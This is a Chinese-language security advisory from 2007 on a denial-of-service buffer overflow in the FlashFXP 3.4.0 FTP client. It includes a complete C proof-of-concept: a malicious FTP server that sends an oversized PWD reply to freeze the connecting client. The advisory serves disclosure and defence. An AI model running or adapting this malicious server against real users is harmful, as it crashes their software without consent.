安全研究
安全漏洞
FlashFXP PWD命令超长畸形参数远程缓冲区溢出漏洞
发布日期:2007-02-06
更新日期:2007-02-07
受影响系统:
FlashFXP FlashFXP 3.4.0 build 1145描述:
BUGTRAQ ID: 22433
FlashFXP是一款流行的FTP客户端。
FlashFXP在处理畸形的命令请求时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞导致客户端失去响应能力。
如果向FlashFXP所发送的PWD命令包含有多于5420个“ \”且被至少一个不同的字符分隔开的话,就会导致应用程序变得不稳定。FlashFXP首先会僵死45秒,耗尽100%的资源;如果用户断开并重新连接到服务器的话,就会导致FlashFXP陷入将数据写入到栈中的死循环。
<*来源:Marsu (Marsupilamipowa@hotmail.fr)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
* FlashFXP V 3.4.0 build 1145 Buffer Overflow DoS *
* *
* *
* There's a strange bug in FlashFXP. *
* When sending a long PWD command with more than 5420 \ separated by at *
* least one different char, it is possible to make the app unstable. *
* It will first freeze during 45s consuming 100% resources, and then, if *
* the user hits disconnect and then reconnects to the server it will enter *
* in an infinite loop trying to put data on the stack. *
* *
* *
* I admit it is a little bit tricky but maybe someone will find a better *
* way to exploit this vuln. *
* *
* Have Fun! *
* *
* Coded by Marsu <Marsupilamipowa@hotmail.fr> *
***************************************************************************/
#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#include "windows.h"
#pragma comment(lib, "ws2_32.lib")
int main(int argc, char* argv[])
{
char recvbuff[1024];
char evilbuff[11000];
sockaddr_in sin;
int server,client;
WSADATA wsaData;
WSAStartup(MAKEWORD(1,1), &wsaData);
int n=1;
while (n<=2)
{
server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = htonl(INADDR_ANY);
sin.sin_port = htons( 21 );
bind(server,(SOCKADDR*)&sin,sizeof(sin));
printf("[*] Listening on port 21...\n");
listen(server,5);
printf("[*] Waiting for client ...\n");
client=accept(server,NULL,NULL);
printf("[+] Client connected\n");
memcpy(evilbuff,"220 Hello there\r\n\0",18);
memset(recvbuff,'\0',1024);
if (send(client,evilbuff,strlen(evilbuff),0)==-1)
{
printf("[-] Error in send!\n");
exit(-1);
}
//USER
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"331 \r\n\0",7);
send(client,evilbuff,strlen(evilbuff),0);
Sleep(50);
//PASS
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"230 \r\n\0",7);
send(client,evilbuff,strlen(evilbuff),0);
//SYST
memset(recvbuff,'\0',1024);
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"215 WINDOWS\r\n\0",14);
send(client,evilbuff,strlen(evilbuff),0);
//FEAT
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"211 END\r\n\0",10);
send(client,evilbuff,strlen(evilbuff),0);
//PWD
int i=5;
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
while (i<10840) {
memset(evilbuff+i,'a',1);
i++;
memset(evilbuff+i,'//',1);
i++;
}
memcpy(evilbuff,"257 \"",5);
memcpy(evilbuff+10840,"\"\r\n\0",4);
send(client,evilbuff,strlen(evilbuff),0);
closesocket(client);
closesocket(server);
client=server=NULL;
if (n<2) {
printf("[+] Now FlashFXP is out for 45sec.\n");
printf("[+] Note that user MUST click on disconnect and then reconnect\n
to trigger the bug.\n\n");
}
n++;
}
Sleep(2000);
printf("\n[+] FlashFXP must be DoSed\n");
return 0;
}
建议:
厂商补丁:
FlashFXP
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.flashfxp.com/
浏览次数:3440
严重程度:0(网友投票)
绿盟科技给您安全的保障